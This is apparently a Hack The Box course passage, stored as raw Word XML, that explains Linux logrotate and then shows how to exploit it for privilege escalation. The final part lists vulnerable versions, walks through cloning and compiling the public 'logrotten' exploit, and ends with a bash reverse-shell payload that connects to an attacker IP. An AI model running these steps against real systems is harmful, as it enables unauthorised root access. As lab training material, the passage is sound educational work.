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496C" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C6935">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4C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Logrotate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A09737" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C6935">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="6595D23D">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5F0CC" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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Every Linux system produces large amounts of log files. To prevent the hard disk from overflowing, a tool called </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logrotate</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes care of archiving or disposing of old logs. If no attention is paid to log files, they become larger and larger and eventually occupy all available disk space. Furthermore, searching through many large log files is time-consuming. To prevent this and save disk space, </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">logrotate </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">has been developed. The logs in </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/var/log</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> give administrators the information they need to determine the cause behind malfunctions. Almost more important are the unnoticed system details, such as whether all services are running correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B839775" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Logrotate</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> has many features for managing these log files. These include the specification of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225612B6" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the log file,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18943A" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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its </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB532E" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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and the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be taken when one of these factors is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2EAF2"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yovecio@htb[/htb]$ man logrotate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC1A95"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yovecio@htb[/htb]$ # or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC4A9B6"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yovecio@htb[/htb]$ logrotate --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF6DF5"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61A0461"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Usage: logrotate [OPTION...] &lt;configfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26D5CE"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-d, --debug               Don't do anything, just test and print debug messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE50E23"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-f, --force               Force file rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C2771"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-m, --mail=command        Command to send mail (instead of '/usr/bin/mail')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761BB8B"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-s, --state=statefile     Path of state file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B64A4C2"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--skip-state-lock     Do not lock the state file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F115C93"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-v, --verbose             Display messages during rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481952C9"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-l, --log=logfile         Log file or 'syslog' to log to syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89CBA1"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--version             Display version information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57559476"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92D5CD2"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Help options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E919F"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 --help                Show this help message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35567A"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--usage               Display brief usage message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62437EBA" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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The function of the rotation itself consists in renaming the log files. For example, new log files can be created for each new day, and the older ones will be renamed automatically. Another example of this would be to empty the oldest log file and thus reduce memory consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261A1CD" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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This tool is usually started periodically via </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and controlled via the configuration file </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/logrotate.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Within this file, it contains global settings that determine the function of </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logrotate</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06891576"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yovecio@htb[/htb]$ cat /etc/logrotate.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408F721"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6FD8DB8"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832B8C9"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see "man logrotate" for details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE7FB6B"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AA51035"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global options do not affect preceding include directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BC761"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6CC8D1C"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rotate log files weekly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E3FD8"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weekly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3FEB0"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F7E68C6"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use the adm group by default, since this is the owning group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F864EAA"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of /var/log/syslog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84CEB1"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su root adm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA0464"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D872A9F"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keep 4 weeks worth of backlogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757AFBBC"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rotate 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1863BF"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4B74105"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create new (empty) log files after rotating old ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65464437"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create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3E54B"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7705CFE"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use date as a suffix of the rotated file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC4194"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#dateext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275CCBA5"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DFD3C9A"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uncomment this if you want your log files compressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670ABA9B"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#compress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A5C445"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F675D7C"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packages drop log rotation information into this directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A56C1"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include /etc/logrotate.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F1BEE"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EBF5002"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system-specific logs may also be configured here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D0855" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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To force a new rotation on the same day, we can set the date after the individual log files in the status file </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/var/lib/logrotate/status</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>--force</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> option:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE59A24"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yovecio@htb[/htb]$ sudo cat /var/lib/logrotate/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C573B2F"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9864753"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/var/log/samba/log.smbd" 2022-8-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B1F68"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/var/log/mysql/mysql.log" 2022-8-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0B3F9" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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We can find the corresponding configuration files in </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/logrotate.d/</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F250D1B"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yovecio@htb[/htb]$ ls /etc/logrotate.d/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74A0BF"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447945C"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alternatives  apport  apt  bootlog  btmp  dpkg  mon  rsyslog  ubuntu-advantage-tools  ufw  unattended-upgrades  wtmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49134026"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yovecio@htb[/htb]$ cat /etc/logrotate.d/dpkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290CA86"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7B62C8F"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/var/log/dpkg.log {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D80E10"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monthly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A081C6"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rotate 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F714E"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compress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA9826"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delaycompress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BC956"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missingok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7D8C9"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notifempty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25346A44"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xml:space="preserve">        create 644 root root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD84F9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B432F3A" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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To exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logrotate</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, we need some requirements that we have to fulfill.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77BE0E" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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we need </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions on the log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC2EDD5" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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logrotate must run as a privileged user or </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002B00EA" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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vulnerable versions: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCEC04B" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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lastRenderedPageBreak/>
        <w:t>3.8.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3A1F6" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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3.11.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705942BB" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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3.15.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B61F1E7" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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3.18.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789E908" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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There is a prefabricated exploit that we can use for this if the requirements are met. This exploit is named </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="004C6935">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>logrotten</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. We can download and compile it on a similar kernel of the target system and then transfer it to the target system. Alternatively, if we can compile the code on the target system, then we can do it directly on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BDC800"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logger@nix02:~$ git clone https://github.com/whotwagner/logrotten.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE77A5"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logger@nix02:~$ cd logrotten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30F85D"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logger@nix02:~$ gcc logrotten.c -o logrotten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4F8B4" w14:textId="77777777" w:rsidR="004C6935" w:rsidRPr="004C6935" w:rsidRDefault="004C6935" w:rsidP="004C693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Next, we need a payload to be executed. Here many different options are available to us that we can use. In this example, we will run a simple bash-based reverse shell with the </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> of our VM that we use to attack the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB5E109"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logger@nix02:~$ echo 'bash -i &gt;&amp; /dev/tcp/10.10.14.2/9001 0&gt;&amp;1' &gt; payload</w:t>
      </w:r>
    </w:p>
